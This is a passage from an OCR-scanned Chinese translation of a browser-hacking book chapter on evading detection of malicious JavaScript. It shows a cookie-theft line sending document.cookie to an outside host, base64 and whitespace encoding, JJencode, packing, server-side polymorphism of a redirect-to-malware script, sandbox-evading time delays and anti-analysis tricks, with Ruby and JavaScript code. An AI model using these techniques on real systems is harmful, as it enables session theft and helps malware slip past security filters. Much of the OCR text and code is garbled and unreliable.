Ef 的 事件 发 生 时 动态 调用 新 函数 “。 








在 MitB 对 一 个 已 经 存在 的 onclick 属 性 下 
毒 时 ,之 前 的 某 些 代码 可 能 就 会 被 覆盖 ， 因 为 正当 的 功能 被 奉 换 了 。 解 决 这 个 问题 的 一 个 思路 是 
fitFHaddEventListenerzkattachEvent (IEMs ), 在 同 档 








在 原来 的 程序 执行 完毕 后 执 


出 Eius 。MitB 技 术 适 用 








于 很 多 情形 ， 只 是 在 将 基于 JavaScript 的 复杂 应 用 作为 攻击 目标 时 ， 
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能 需要 自 定 义 默 认 行为 。 








知 避 Web 应 用 防火 填 、Web 代 理 和 客户 端 启发 式 防 病毒 技术 的 检测 ， 是 一 个 猫 捉 老 鼠 的 
游戏 。 安 全 研究 者 经 常 发 现 新 的 躲避 技术 ,可 以 在 某 个 时 间 段 内 使 用 。 而 在 该 技术 广为人知 
之 后 ,防御 者 就 会 拿 出 对 应 的 检测 技术 ,这 种 躲避 技术 也 就 失效 了 。 把 这 个 过 程 转换 成 伪 代 











码 ， 如 下 所 示 : 


loop 

develop evasion() 

use it in the wild() 

Sleep 10 

defenders become aware() 

sleep 20 

defenders implement detection() 
end 





别 忘 了 ,检测 技术 要 广泛 应 用 的 话 ， 








很 长 时 间 。 在 此 








期 间 ， 躲 避 技 术 在 茶 种 程度 上 
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也 还 是 有 效 的 。 把 各 种 躲避 技术 综合 起 来 , 也 是 一 种 策略 。 虽 然 不 一 定 能 躲 得 过 聪明 人 的 手工 检 
测 ， 但 对 付 一 些 代 理 和 检测 HTTP 或 其 他 协议 内 容 的 安全 设备 还 是 能 胜任 的 。 

想象 一 个 俄罗斯 套 娃 ， 每 一 层 都 相当 于 一 种 躲避 技术 ， 而 真正 的 JavaScript 代 码 就 深 藏 其 中 。 
记 住 ， 模 糊 JavaScript 并 不 能 阻止 浏览 器 理解 代码 。 
以 下 几 节 将 介绍 一 些 减 小 你 的 JavaScript 代 码 被 发 现 可 能 性 的 技术 。 这 些 技术 都 在 BeEF 框 架 
中 作为 扩展 得 到 了 实现 。 
再 强调 一 次 ， 编 码 和 模糊 不 能 保证 数据 的 机 密 性 。 假 以 时 日 ， 任 何 模糊 技术 都 可 能 被 攻克 。 


3.4.1 使 用 编码 躲避 


第 一 种 也 是 最 简单 的 隐藏 代码 的 方式 就 是 对 其 编码 。 这 里 所 说 的 编码 或 解码 , 指 的 是 把 代码 
从 一 种 格式 转换 成 另 一 种 格式 。 基 于 浏览 器 的 编码 和 技术 有 很 多 。 其 中 一 些 很 简单 ， 就 是 使 用 
base64 编 码 纯 文本 字符 串 。 还 有 一 些 高 级 点 儿 ,， 依赖 JavaScript 语 言 的 高 级 特性 ， 比 如 非 数 字 字 母 
编码 。 

1. base64 编 码 

有 一 种 常见 的 检测 恶意 JavaScript 的 技术 ， 使 用 基于 正则 表达 式 的 过 滤器 ， 搜 索 eval 、 
document . cookie 或 其 他 可 能 用 于 恶意 目的 的 关键 字 。 如 果 你 想 盗 取 一 个 Web 应 用 的 cookie, H. 
该 cookie 没 有 被 标记 为 HttpOnly， 那 可 以 执行 这 行 代码 : 

location.href='http://browserhacker.com?c='+document . cookie 

这 行 代码 会 把 cookie 发 给 你 的 网 站 。 可 惜 的 是 , 原来 站 点 的 过 滤 程 序 可 能 会 检测 对 aocument . 
cookie 的 引用 并 将 其 过 滤 掉 。 为 了 隐藏 4ocument .cookie， 可 以 使 用 base64 对 其 编码 ， 这 样 攻 
击 方式 就 变 成 了 : 


eval (atob ("bG9jYXRpb2 4uaHJ1Zj OnaHROcDovL2FO0dGF"+ 
"Ja2VyLmMNvbT9jPScrZG9jdWilbnQuy29va211")); 


但 基于 正则 表达 式 的 过 滤器 还 是 会 阻止 它 ， 因 为 关键 字 eval 还 在 黑 名 单 中 。 不 过 ， 访 问 
window 对 象 的 方法 有 很 多 种 ， 通 过 它们 可 以 使 用 不 同 的 语句 来 实现 eval 的 行为 ， 比 如 : 

[].constructor.constructor ("code") (); 

另 一 种 方法 是 使 用 setTimeout () 或 setInterval () 图 数 (在 较 新 的 浏览 器 中 甚至 可 以 使 
用 setImmediate() )， 它 们 都 可 以 对 JavaScript 函 数 求 值 。 注 意 , 在 使 用 setTimeout () 函数 时 ， 
第 二 个 参数 用 于 指定 多 少 毫秒 后 调用 这 个 函数 , 但 它 不 是 必需 的 。 如 果 不 指 定 , 那么 就 会 立即 调 
用 相应 函数 。 使 用 setTimeout () 时， 最 终 代 码 会 变 成 这 样 : 


setTimeout (atob("bG9j YXRpb24uaHJ1Zj0naHROcDovL2Jyb3 "+ 
"dzZXJoYWNrZXIuY29tP2M9Jytkb2N1bWVudC5jb29raWU")); 


这 段 代 码 绕 过 了 前 面 提 到 的 基于 正则 表达 式 的 过 滤器 , 也 演示 了 将 多 种 躲避 技术 结合 起 来 使 
用 的 方法 。 
base64 并 非 唯 一 的 编码 方法 。 还 有 很 多 其 他 可 用 的 方法 ， 比 如 URL 编 码 、 双 URL 编 码 、 十 六 
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进 制 编码 、Unicode 转 义 ， 等 多 


打包 JavaScript 


包 或 最 小 化 JavaScript 同 样 有 助 于 躲避 检测 ， 特 别 是 如 果 组 合 使 用 后 面 几 节 将 要 介绍 的 
随机 变量 和 其 他 技术 ， 效 果 会 更 好 。 TM 过 程 涉及 删除 代码 中 所 有 不 必要 的 字符 , 但 不 影 


响 代 码 运行 。 而 打包 则 更 类 似 于 压缩 ,通常 涉及 缩短 变量 名 和 其 他 函数 调用 。 以 下 面 的 代码 段 
为 例 (后面 还 会 介绍 ): 
var malware = { 


version: '0.0.1-alpha', 
exploits: new Array("http://malicious.com/aa.js",""), 
persistent: true 

yg 


window.malware - malware; 


function redirect to site()( 
window.location - window.malware.exploits[0]; 


1g 
redirect to site(); 


使 用 Dean Edwards 的 打包 程序 "打包 这 段 代 码 后 ， 结 果 如 下 所 示 : 


eval (function(p,a,c,k,e,r) {e=function(c) {return c.toString(a) }; 
LEY reap lacei/°7 Strrng))(twhlleic--)r]etfc)l]sk]Ie]bbeibe): 
k=[function(e) {return r[e]}];e=function() {return'\\w+'}; 
c=1};while(c--)if(k[c])p=p.replace (new RegExp('\\b'+e(c)+ 

UN NIS) epo) led no (oy) Baits \ 0) 510) S 30x A S, 

Tere PINS) ce als 0 ap apu Sj com my SYED oboe EJ] tS (Og 
20,20,'||malwarelwindowlexploits|redirect to sitelmalicious 
|version|new|Array|httplvar|com|aaljslpersistent|true| 
function|alphallocation'.split('|'),0,1())) 


tote PIL, Sed, malware, windowfeexploits, 在 代码 最 后 仍然 存在 。 而 
使 用 了 随机 变量 和 方法 名 的 技术 后 ， 同 样 的 代码 会 变 成 这 样 : 


eval (function(p,a,c,k,e,r) {e=function(c) {return c.toString(a)); 
if(!''.replace(/^/,String))(while(c--)r[e(c)]-sk[cllle(c); 
k-[function(e)(return r[e]}];e=function() {return'\\w+'};c=1}; 
while(c--)if(k[c])p=p.replace (new RegExp('\\b'+e(c)+ 

(AIO c. Orgy EIEN) pre jo} (Tid, hetero y EN 9S6. 7 

HS HLS) Serge 7 MO) iac o» ded eg. A2 ost 1 53:11013/$ 
4();',19,19,'|uxG£LVC|window|egCSx|HrhB|com|new| 
Array|http|malicious|sXCrv|aaljs|LctUZLQnJ. gpl 
trnuüelzepXEDxSMs[funetronm|varllocabron'.splitit'b',07;41323) 


这 两 段 打包 后 的 代码 明显 不 一 样 。 


3.4 ”躲避 检测 87 





2. 空白 符 编码 

Kolisar 在 DEFCON 16 上 展示 了 一 种 很 巧妙 的 编码 技术 ， 叫 作 空 白 符 编码 ( WhiteSpace 
encoding ) “”。 这 个 技术 背后 的 思路 是 使 用 空白 字符 对 ASCII 值 进行 二 进 制 编码 。 如 果 把 Tab 字 符 映 
射 为 0， 把 空格 符 上 映射 为 1， 就 可 以 仅 用 这 两 个 字符 对 数据 进行 编码 。 编 码 结果 只 有 空白 符 ， 这 也 
是 这 种 技术 名 字 的 来 由 。 很 多 自动 反 模糊 工具 会 忽略 空白 符 , 因此 这 种 技术 很 容易 让 反 模 糊 无 效 。 

可 以 使 用 下 面 的 示例 Ruby 实 现 生成 编码 的 JavaScript， 然 后 再 在 攻击 中 使 用 : 


def whitespace_encode (input) 

output = input.unpack('B*') 

output = output.to_s.gsub(/[\["01\] 
Up gs > CÓ! - 


















































M oed 
oe 
ct 
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1 
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encoded = whitespace encode("alert(1)") 
File.open("whitespace out.js", 'w'){|f| f.write(encoded)) 


试 一 下 就 知道 ， 传 人 whitespace_encode O 函数 的 内 容 会 被 转换 成 二 进 制 表 示 ， 然 后 0 再 
被 映射 为 Tab ，1 再 被 映射 为 Space。 结 果 会 被 写 人 一 个 新 文件 ， 方 便 复制 粘贴 。 这 段 代码 需要 一 
个 引导 程序 , 才能 正确 解码 和 对 传人 的 内 容 进行 求 值 。 下 面 的 JavaScript 实 现 包含 了 保存 有 前 面 纺 
人 码 结果 的 变量 whitespace_encoded: 






































// 如 果 从 这 里 复制 粘贴 代码 ，Tab 可 能 无 效 
// 确保 你 是 在 尝试 Dprowserhacker .com 的 代码 片段 
var whitespace_encoded = " 
function decode_whitespace(css_space) { 
var spacer = ''; 
for(y = 0; y < css_space.length/8; y++){ 


Apc ac 
for(x = 0; x < 8; x++){ 
if (css_space.charCodeAt (x+(y*8)) > 9) { 
V4; 
J 
IE de Wl 
v=av<< 1 


we 


spacer += String.fromCharCode(v); 
}return spacer; 
} 
var decoded = decode_whitespace (whitespace_encoded) 
console.log(decoded.toString()); 
window.setTimeout (decoded) ; 


it decode whitespacePKZ HIT fitfidwnitespace encodeaZEEBUpgZE, Hoa f 
用 前 面 的 Ruby 脚 本 生成 的 空白 符 。 解 码 过 程 逐 个 字 节 地 重 构 了 数据 字符 。sString .from 
charcode 用 于 返回 原始 字符 串 。 最 后 ， 再 使 用 setTimeout 对 解码 后 指令 的 字符 串 表 示 求 值 ， 
最 后 执行 代码 。 

如 图 3-15 所 示 ， 解 码 后 的 源 代码 Calert (1) ) TEsetTimeout () 调 用 中 被 求 值 了 。 
































»*w€2» [7 Console | HTML CSS Script DOM 








iè Clear Persist Profile (All, Errors Warnings Info Debug Inf Yor -\ion decode whitespace(cos, space) { 
v 





»»» var whitespace encoded = 55 spaco.length/8; y**) 
" Ti 


». decoded.toString()); window.setTimeout(decoded); 


alert(1) 
15 


r(x = OF x < 8; x+) 


Fn ere reta Od BEL »9) 
1 


解码 引导 程序 


spacer += String. fromCharCode(v); 
}return spacer; 


调用 5 | 导 程 序 后 , 就 会 执行 var decoded = ee 
解码 后 的 数据 ， 弹 出 对 话 框 00 eindoessechinsoredcecded)s 








图 3-15 空白 符 编码 的 例子 


3. 非 数 字 字 母 JavaScript 

不 管 你 信 不 信 ,JavaScript 语 言 的 灵活 性 可 以 做 到 让 你 不 使 用 任何 数字 字母 字符 对 数据 进行 编 
人 码 。2009 年 , 日 本 安全 研究 人 员 Yosuke Hasegawa 发 现 了 一 种 只 使 用 [],s$_+:~{} 这 样 的 符号 来 编 
人 码 JavaScript 的 方法 。 

如 果 深 入 分 析 这 种 技术 的 原理 ， 可 能 需要 一 章 篇 幅 才 行 。 如 果 你 真 对 它 的 实现 感 兴趣 ， 可 
以 参考 下 列 资料 和 白皮书 。 一 种 使 用 非 数 字 字 母 JavaScript 编 码 数 据 的 方式 是 JJencode ， 其 反 模 
糊 过 程 已 经 由 Peter Ferrie 分 析 过 了 ”。 男 一 个 关于 模糊 的 有 用 资源 是 Web Application 
Obfuscation X A 45 , 

非 数 字 字 母 JavaScript 极 度 依赖 JavaScript 中 的 特定 类 型 转换 功能 , 这 种 转换 功能 在 Java 或 C++ 
等 强 类 型 语言 中 是 不 存在 的 。 下 面 简单 介绍 一 下 这 种 方法 的 基本 概念 。 

首先 ， 在 JavaScript 中 ， 可 以 通过 在 变量 后 面 拼接 一 个 空 字 符 串 ， 将 其 转换 成 字符 串 表示 : 

1e"" // 返 回 "1" 

其 次 ,只 使 用 符号 就 有 很 多 种 方式 可 以 返回 布尔 值 。 例如， 可 以 使 用 空 数组 、 空 对 象 和 空 字 
FEB 


![] // 返 回 false 
!() // 返 回 false 
1"" // 返 回 true 


基于 这 些 行为 , 很 容易 构建 字符 串 。 比 如 , 要 构建 一 个 字符 串 "false", 可 以 使 用 以 下 代码 : 
(C8140) 
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首先 是 一 个 空 数组 [] ， 使 用 ! 对 其 求 反 ， 得 到 布尔 值 false。 然 后 将 其 包装 在 另 一 个 空 数 组 
中 ,后 面 再 连接 另 一 个 空 数 组 。 这 样 就 得 到 了 字符 串 "false"。 既 然 可 以 创建 任意 字符 串 ， 那 么 
试 试 引用 windqow 吧 。 

下 面 是 一 个 很 老 的 例子 ， 可 以 在 Firefox 中 使 用 : 



































alert((1,[].sort)()) 
下 面 是 一 个 改写 后 的 例子 ， 在 Chrome 中 可 以 使 用 : 
alert ((0,[].concat) ()) 





前 面 两 个 例子 使 用 sort 和 concat 函 数 返 回 windaow， 因 为 它们 不 知道 引用 的 是 哪个 数组 。 

此 时 ， 你 既 可 以 创建 任意 字符 串 ， 又 可 以 引用 windqow， 那 么 就 可 以 调用 winaqow.alert 及 
其 他 静态 方法 了 。 不 过 ,需要 使 用 巧妙 的 方法 对 生成 的 字符 串 求 值 。 前 面 我 们 也 讨论 了 对 字符 串 
求 值 的 方法 ， 但 最 简单 的 方法 还 是 使 用 constructor: 

[1.constructor.constructor("alert(1)")() 

从 一 个 数组 对 象 访问 两 次 constructor， 就 可 以 得 到 Function。 之 后 ， 就 可 以 传人 任意 字 
符 串 以 求 值 了 ， 比 如 传人 "alert(1)"。 

现在 有 很 多 工具 可 以 辅助 生成 JavaScript 的 非 数字 字母 编码 ， 比 如 JJencode fllAAencode" , 
作者 都 是 Yosuke Hasegawa。AAencode 甚 至 演示 了 使 用 日 本 风格 的 表情 符号 编码 JavaScript。 下 面 
是 使 用 JJencode 编 码 alert (1) 得 到 的 结果 : 


































































































$2-[1;$2(  :44$,$$$$: (![]+"") [$],__$:+4+$,$_$_:(!(]+"") IS], 

—2$.:44$,9 $$: ({}4+"") LD$1, $$ $: ($[$]+"") [$1], $$: 9$, $$$ (17 "2"") [S], 
$__:++$,S_$:++8,$$__: ({}+"") [$],$$_:4++$,$S$:++5,$___:++$,$__$:4++$}; 
$.S_=($.$_=$+"") [$.$_$]+($._$=8.$_[$.__$])+($.$$=(S.$+"") [$.__$]) + 

((!$)4+"") [$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"") [$.__$] )+($._=(1""4+ 
"")[S._S_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$S=S.S+(1""4"") [S._SS]+S._ « 
$._+$.$+$.$$;$.$=($. )IS.S_][$.$_];$.$($.$(S.SS+"\""4+S.S$_S_+(![]+ 

mH) TSS] 45.SSS_ a" \\ "4S. o $49.99 45. $ $5. ("SS SEM\\ TESS + 

Soh) "«"N"")0) 07; 

显然 ， 编 码 短 短 的 alert (1) 就 需要 那么 多 字符 。 虽 然 这 让 编码 技术 变 得 非常 有 意思 ， 却 损 











失 了 效率 , 特别 是 在 编码 数 百 行 JavaScript 代 码 的 情况 下 。 且 不 论 其 适用 性 ,多 一 种 隐藏 小 代码 段 
的 编码 技术 总 是 好 事 。 

Yosuke 最 初 关 于 JJencode 的 思路 激 起 了 安全 行业 的 兴趣 ， 导 致 了 这 个 领域 的 更 多 研究 ， 而 最 
Ja Robert Hansen 还 在 slackers.org 上 办 起 了 Diminutive NoAINum JS Contest? , 


3.4.2 ”使 用 模糊 躲避 


前 几 节 介绍 了 编码 的 原理 ， 以 及 怎么 通过 它们 隐藏 JavaScript 代 码 。 模 糊 作为 另 一 种 隐藏 
JavaScript 代 码 的 方法 , 在 与 编码 共同 使 用 时 ,能够 更 加 有 效 地 绕 过 网 络 过 滤器 。 这 些 技术 都 是 非 
常常 用 的 。 来 自 BlackHole “等 利用 工具 包 的 客户 端 攻击 ,经 常会 利用 模糊 加 编码 来 隐藏 JavaScript。 
以 下 几 小 节 将 介绍 几 种 让 你 的 代码 不 容易 被 检测 到 的 技术 。 
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1. 随机 变量 和 方法 

如 果 你 是 一 名 开发 人 员 , 就 应 该 知道 编写 清晰 和 可 维护 的 代码 始终 是 最 优 考虑 的 事情 。 下 面 
的 代码 很 容易 看 懂 ， 因 为 其 变量 和 方法 名 都 表示 自身 的 功能 。 开始 是 创建 一 个 名 为 malware 的 新 
对 象 ， 包 含 一 些 属性 。 人 然后 将 malware 对 象 附 加 到 window 对 象 ， 再 调用 redirect_to_site() 


函数 ， 该 函数 会 把 浏览 器 重 定向 到 前 面 exploits 数 组 中 的 第 一 个 URL : 


var malware = { 
version: '0.0.1-alpha', 
exploits: new Array("http://malicious.com/aa.js",""), 
persistent: true 



































} . 


i 
window.malware = malware; 


function redirect to site()( 
window.location - window.malware.exploits[0]; 


Me 
redirect to site(); 
现在 假设 有 一 个 网 络 过 滤器 ， 正 在 使 用 基于 正则 表达 式 的 规则 搜索 网 络 流量 ， 检 测 其 中 的 
malware 代 码 、version 号 和 redirect_to_malware() 及 其 他 函数 名 。 这 种 情况 比 我 们 想象 得 
更 常见 ， 尤 其 在 服务 器 端 代码 没有 多 态 化 的 情况 下 更 加 有 效 。 
服务 器 端 多 态 化 
这 种 技术 主要 被 恶意 软件 利用 ， 用 于 修改 代码 ， 使 代码 很 难 基于 静态 签名 被 标记 为 恶意 代 
P, 代码 也 会 在 每 次 匀 连 时 变化 ， 也 就 是 说 ， 如 果 同 一 个 恶意 软件 感染 两 台 机 器 ， 那 么 两 台 
机 器 中 的 代码 会 不 一 样 ， 但 功能 还 一 样 。 




















实现 基本 的 服务 器 端 代 码 多 态 化 并 不 困难 。 下 面 这 个 简单 的 例子 演示 了 针对 每 个 勾 连 的 浏览 
器 使 用 散 列 数据 结构 ( 如 果 你 想 实 现 每 个 会 话 多 态 化 ) 分 别 保存 原始 值 和 随机 值 以 备 将 来 引用 。 


code = <<EOF 

var malware = { 
version: '0.0.1-alpha', 
exploits: new Array ("http://malicious.com/aa.js",""), 
persistent: true 




















J 
window.malware = malware; 
function redirect_to_site(){ 
window.location = window.malware.exploits[0]; 
is 
redirect to site(); 
EOF 


def rnd(length-5) 
chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ ' 
result - '' 
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length.times { result << chars[rand(chars.size)] } 
result 
end 


lookup = { 
"malware" => rnd(7), 
"exploits" => rnd(), 
"version" => rnd(), 
"persistent" => rnd(12), 
"0.0.1-alpha" => rnd(10), 
"redirect to site" => rnd(4) 


) 





lookup.each do |key,value| 
code - code.gsub!(key, value) 
end 





File.open("result.js", 'w')(Iflf.write(code)) 
每 次 调用 前 面 的 代码 ( 比如 勾 连 一 个 新 浏览 器 )，result .js 中 的 JavaScript 代 码 都 会 不 同 。 
例如 : 


var uxGfLVC = { 
SXCrv: 'ZEpXkhxSMz', 
egCSx: new Array("http://malicious.com/aa.js",""), 
LctUZLOnJ gp: true 
Ji 
window.uxGfLVC - uxGfLVC; 
function HrhB() { 
window. location = window.uxGfLVC.egCSx[0]; 
Er 
HrhB(); 


随机 变量 和 函数 名 不 考虑 作用 域 。 如 果 考 虑 作用 域 ， 得 到 的 结果 代码 肯定 更 难于 被 人 看 懂 。 
假设 前 面 的 代码 中 包含 了 另 一 个 叫 execute() 的 函数 ， 而 redirect_to_site() 接 收 了 一 个 输 
AZ 


function execute (cmd) { 
eval(cmd); 
hs 
function redirect to site(input)( 
if(input) 
window.location - window.malware.exploits[0]; 
he 
redirect to site(input); 


模糊 这 个 示例 并 考虑 作用 域 会 得 到 如 下 代码 。 对 人 类 而 言 ， 这 些 代 码 很 难看 懂 ， 因 为 他 们 可 
能 会 错误 地 认为 ， 同 样 的 全 局 变量 会 在 多 个 函数 中 被 用 到 。 
function gSYYtNBjNFbZ (napSj) { 


eval (napSj); 
Es 








92 RIE 持续 控制 





function HrhB(napsj) { 
if (napSj) 
window.location = window.uxGfLVC.egCSx[0]; 


Jo 


HrhB (napSj) ; 

2. 混合 对 象 表示 法 

如 果 要 看 很 多 JavaScript 代 码 ， 我 们 通常 习惯 于 用 点 访问 属性 ， 而 不 习惯 于 用 方 括号 <”。 但 对 
语言 本 身 来 说 ， 这 两 种 表示 法 是 等 价 的 。 

前 面 的 代码 使 用 的 是 点 表示 法 。 比 如 ， 先 调用 window 对 象 ， 然 后 是 malware 对 象 ， 最 后 是 
malware 对 象 的 属性 : 

window.malware.exploits[0]; 


同样 的 代码 可 以 用 方 括号 表示 法 写成 这 样 : 





















































window['malware']['exploits'][0]; 
混合 两 种 表示 法 同样 可 以 写 出 功能 一 样 的 代码 : 
window.malware['exploits'] [0]; 








扩展 一 下 ， 可 以 对 前 面 的 例子 组 合 使 用 这 些 技术 ， 包 括 base64 编 码 ， 得 到 如 下 结果 : 


var uxGfLVC = { 
SXCrv: 'ZEpXkhxSMz', 
egCSx: new Array ("\x68\x74\x74\x70\x3A\X2F\x2F"+ 
"\x6D\x61\x6C\x69\x63\xK69\xX6F"+ 
atob("dXMuY35f34fgdkFhLmpz"['replace'] ( 
/[35t34fgdk/,"' 29t52')]),""—j, 
LctUZLOnJ gp: true 
is 














window['uxGfLVC'] - uxGfLVC; 
function HrhB() { 
window['lo'«'ca'«'ution'['replace']( 
/ution/,'tion')] = window.uxGfLVC['egC'« 
'Sx'] [0]; 
E 
HrhB(); 
很 明显 (或 者 并 不 明显 )， 混 合 使 用 点 和 方 括号 表示 法 ， 代 码 变 得 不 可 读 了 。 
查询 数组 常用 array [index] 或 array['string_element']。 在 前 面 例子 的 代码 中 , 访问 
对 象 的 方法 和 属性 也 采用 了 同样 的 语法 , 而 且 使 用 了 没有 意义 的 变量 名 , 你 可 能 会 认为 方 插 号 是 
用 来 从 数据 结构 中 取得 值 的 。 但 显然 不 是 这 样 的 ， 只 不 过 实现 了 模糊 的 目的 。 而 这 种 模糊 不 仅 会 
给 人 类 的 分 析 造 成 障碍 ， 对 网 络 过 滤 亦 然 。 
3. 时 间 延 迟 
基于 时 间 的 检查 是 恶意 软件 躲避 模拟 的 另 一 种 方法 。 亚 意 软件 检测 技术 经 常 模拟 JavaScript 
引擎 ， 特 别 是 那些 WAF 或 代理 中 的 检测 技术 。 然 而 ， 这 些 引擎 出 于 性 能 考虑 ， 往 往 会 忽略 
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setTimeout () 或 setInterval () 的 延迟 。 检 测 JavaScript 亚 意 程序 的 内 联网 络 代理 不 可 能 等 30 
秒 钟 而 伤害 用 户 。 

这 种 行为 可 以 通过 实现 自动 延迟 执行 的 逻辑 来 利用 ， 比 如 使 用 setTimeout () 。 经 过 一 段 时 
间 后 被 调用 的 因数 也 会 检查 Date () 对象 ， 以 确定 延迟 时 间 是 否 到 达 。 如 果 没 有 ， 就 不 会 触发 执 
行 恶 意 代码 的 加 密 程序 。 这 些 技 术 虽 然 可 以 躲 过 对 潜在 恶意 JavaScript 的 自动 分 析 , 但 不 一 定 会 被 
人 忽略 。 下 面 看 一 个 例子 : 


var timeout = 10000; 
var interval = new Date().getSeconds(); 
function timer () { 

var s interval = new Date().getSeconds(); 


























var diff - s interval - interval; 
if(diff -- 10 && diff > 0) key = diff + "aaa" 
if(diff -- -10 && diff < 0) key = diff + "bbb" 


decrypt (key); 
} 
function decrypt (key) { 
// 加 密 程 序 
alert (key); 
} 
setTimeout ("timer()", timeout); 
timer () 函数 会 在 10 秒 钟 的 延迟 后 被 调用 。 程 序 流 进 入 该 函数 后 , 会 有 程序 检测 是 否 已 经 过 
了 10 秒 。 如 果 到 了 预定 时 间 ， 就 会 创建 加 密 程 序 所 需 的 密 钥 ， 并 调用 加 密 程 序 。 如 果 将 前 面 的 代 
码 ,， 包 括 不 同 的 时 间 延 退 ， 模 糊 为 多 个 部 分 , 那么 分 析 起 来 就 困难 多 了 。 你 可 能 想 在 自己 的 代码 
中 使 用 不 同 的 时 间 延 迟 。 这 个 技术 很 有 用 , 由 于 大 多 数 用 于 分 析 恶 意 程序 的 JavaScript 沙 箱 都 有 固 
定 的 超时 时 间 ， 超 时 之 后 就 会 放弃 对 模糊 代码 的 分 析 。 
4. 混合 其 他 上 下 文 的 内 容 
另 一 种 模糊 JavaScript 的 方法 是 混合 上 下 文 。 如 果 是 人 工 反 模糊 , 那么 人 首先 会 关注 JavaScript 
代码 本 身 , 通常 会 认为 只 有 一 个 上 下 文 。 想 象 一 下 ,要 是 把 代码 切 分 成 多 个 部 分 或 上 下 文 ， 那么 
每 一 部 分 都 需要 其 他 上 下 文 的 信息 才能 起 作用 ,以 下 代码 调用 了 decrypt () 函数 ,将 两 个 String 
WER KADOM) 拼接 起 来 的 一 个 字符 串 作 为 参数 
<body> 
<div id="hidden_div"> 
<p>key</p> 


</div> 
</body> 


第 二 个 字符 串 来 自 页面 的 URI 一 一 http:/browserhackercom/mixed-contentdom.html#YTJWNU1p 
MWpiMjUwWlclIMA==: 









































function decrypt (key) { 
// 加 密 程 序 








alert (key); 
j 


var key - document.getElementById('hidden div').innerHTML; 
var key2 = location.href.split("#") [1]; 


decrypt(key + key2); 
如 果 人 类 分 析 师 只 针对 这 段 脚 本 本 身 进行 反 模 糊 , 那么 结果 就 不 会 特别 好 。 使 用 这 种 技术 的 
结果 如 图 3-16 所 示 。 








> = -|| Console- HTML CSS Script DOM Net Cookies 





2E 3 function decrypt(key) { 
ie Clear Persist Profil // decryption routine 
n alert(key); 





>>> function decrypt(key } 


decryption A var key = document.getElementById('hidden div').innerHTML; 
routine...cation.href.Sp var key2 = location.href.split("#")[1]; 


decrypt(key + key2); BE 





图 3-16 ”混合 了 两 个 上 下 文 的 模糊 代码 


同样 的 思路 不 仅仅 只 适用 于 DOM， 还 适用 于 其 他 不 同 的 上 下 文 。JavaScript 也 可 以 访问 PDF、 
Flash 和 Java 小 程序 ， 因 此 这 些 来 源 也 可 以 成 为 不 同 的 上 下 文 。 

5. 使 用 callee 属 性 

在 JavaScript 中 ， 如 果 在 函数 内 部 调用 arguments .callee， 则 会 返回 函数 自身 。 这 个 属性 
在 需要 使 用 匿名 递归 函数 的 情况 下 非常 有 用 。 可 惜 的 是 ，JavaScript 已 经 不 提倡 使 用 这 个 属性 了 ， 
因此 在 ECMAScript 5 的 严格 模式 下 ， 这 个 属性 无 法 使 用 。 

利用 arguments .callee 返 回 水 数 自身 的 特性 ,可 以 让 反 模 糊 更 困难 。 想 象 一 下 ， 孙 数 会 检 
查 自身 代码 的 长 度 。 如 果 检 查 失败 ， 函 数 的 部 分 代码 将 不 会 执行 。 如果 有 人 在 手工 对 这 些 代 码 求 
fH, BATE, 那么 检查 就 可 能 会 失败 。 这 种 情况 在 手工 审查 模糊 代码 时 经 常 出 现 。 例 如 ， 骨 套 
的 eval () 调 用 可 能 会 被 替换 成 console.1og() 之 类 的 辅助 函数 ,或 其 他 自 定 义 的 打印 输出 函 
数 ， 以 便 在 实际 求 值 函数 之 前 更 好 地 理解 代码 。 

如 果 在 一 个 依赖 arguments .callee 检 查 自身 长 度 的 模糊 函数 内 使 用 这 种 手段 ,那么 示例 中 
包含 恶意 代码 的 部 分 可 能 永远 也 不 会 执行 。 如 果 手 工分 析 过 程 中 修改 了 这 种 模糊 代码 ,而 对 代码 
长 度 的 检查 并 没有 变化 ,那么 恶意 代码 就 不 会 运行 了 。 为 了 更 好 地 理解 上 述 过 程 ， 可 以 看 一 看 下 














T 
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面 这 段 Ruby 代 码 的 实现 : 


placeholder = "XXXXXX" 

code = <<EOF 

function boot () { 

var key = arguments.callee.toString().replace(/NNW/g,""); 

console.log(key.length) ; 

if(key.length == #{placeholder}) { 
console.log("verification OK"); 
//... 这 里 是 恶意 代码 

}else{ 
console.log("verification FAIL"); 
//... 这 里 是 死 代 码 } 





} 
EOF 


code length = code.gsub(/NW/,"").length 
# XXXXXX -> 6 chars 
digits = code length.to s.length # returns the number of integer digits 
if(digits »- placeholder.length) 
to add - digits - placeholder.length 


final code = code.gsub(placeholder , (code length + to add).to s) 
else 

to remove - placeholder.length - digits 

final code - code.gsub(placeholder , (code length - to remove).to s) 
end 
File.open("result.js", 'w')(Ilflf.write(final. code)) 


得 到 的 JavaScript 将 被 写 人 resultjs， 内 容 如 下 所 示 : 


function boot () { 
var key = arguments.callee.toString().replace(/NW/g,""); 
console.log(key.length) ; 
if(key.length == 166) { 
console.log("verification OK"); 
//... 这 里 是 恶意 代码 
jelsef 
console.log("verification FAIL"); 
//... 这 里 是 死 代码 


为 方便 说 明 起 见 ， 这 里 的 代码 并 没有 模糊 ， 而 且 通 过 Ruby 脚 本 计算 的 166 整 数 也 没有 , 但 这 
两 方面 通过 使 用 前 面 介绍 的 技术 都 很 容易 模糊 掉 。 比 如 , 在 经 过 前 面 Ruby 代 码 处 理 后 , 你 可 以 用 
以 下 代码 代替 166: 


document.getElementById('hidden div').innerHTML + 
atob(location.href.split("#") [1]) 


document .getElement ByID () 函数 会 从 当前 文档 中 取得 ID 为 hiadqen_daiv 的 元 素 , 结果 返 
回 160。 第 二 部 分 则 取得 当前 文档 片段 标识 符 之 后 的 所 有 base64 编 码 的 内 容 ， 然 后 解码 ， 再 返回 
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值 (返回 6 )。 两 个 值 加 在 一 起 还 是 166。 这 是 一 个 组 合 使 用 不 同 编码 和 模糊 技术 的 非常 简单 的 例 
子 。 层 释 和 连 绥 我 们 讲 过 的 一 些 技术 ， 对 于 防止 手工 和 自动 分 析 你 的 JavaScript 代 码 非常 有 帮助 。 

6. 使 用 JavaScript 引 警 的 奇怪 特性 躲避 

如 果 你 知道 自己 的 目标 使 用 的 是 什么 泻 染 引擎 ,就 可 以 调整 自己 的 模糊 技术 , 通过 利用 不 同 
